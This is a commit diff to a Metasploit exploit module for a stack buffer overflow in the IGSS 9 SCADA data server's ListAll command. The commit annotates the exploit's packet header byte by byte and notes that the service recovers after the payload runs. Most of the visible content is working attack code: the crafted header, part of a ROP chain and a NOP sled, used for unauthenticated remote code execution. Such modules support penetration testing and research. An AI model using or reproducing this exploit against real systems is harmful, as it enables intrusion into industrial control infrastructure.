Updated description, documented packet header a bit

git-svn-id: file:///home/svn/framework3/trunk@12774 4d416f70-5f16-0410-b530-b9f4589650da

modules/exploits/windows/scada/igss9_igssdataserver_listall.rb

@@ -25,7 +25,8 @@ class Metasploit3 < Msf::Exploit::Remote
 				IGSS up to version 9.00.00 b11063. While processing a ListAll command, the application
 				fails to do proper bounds checking before copying data into a small buffer on the stack.
 				This causes a buffer overflow and allows to overwrite a structured exception handling record
-				on the stack, allowing for unauthenticated remote code execution.
+				on the stack, allowing for unauthenticated remote code execution.  Also, after the payload
+				exits, IGSSdataServer.exe should automatically recover.
 			},
 			'License'        => MSF_LICENSE,
 			'Version'        => '$Revision$',
@@ -146,7 +147,14 @@ class Metasploit3 < Msf::Exploit::Remote
 			0x1b764716,  # PUSHAD # RETN
 		].pack('V*')
 
-		header = "\x00\x04\x01\x00\x34\x12\x0D\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00"
+		header  = "\x00\x04"  #Size
+		header << "\x01\x00\x34\x12"
+		header << "\x0D"      #Opcode
+		header << "\x00\x00\x00\x00\x00\x00\x00"
+		header << "\x01"      #Flag
+		header << "\x00\x00\x00"
+		header << "\x01"      #Command (ListAll)
+		header << "\x00\x00\x00"
 		header << rand_text(14)
 		sploit = rop_chain
 		sploit << "\x90" * 10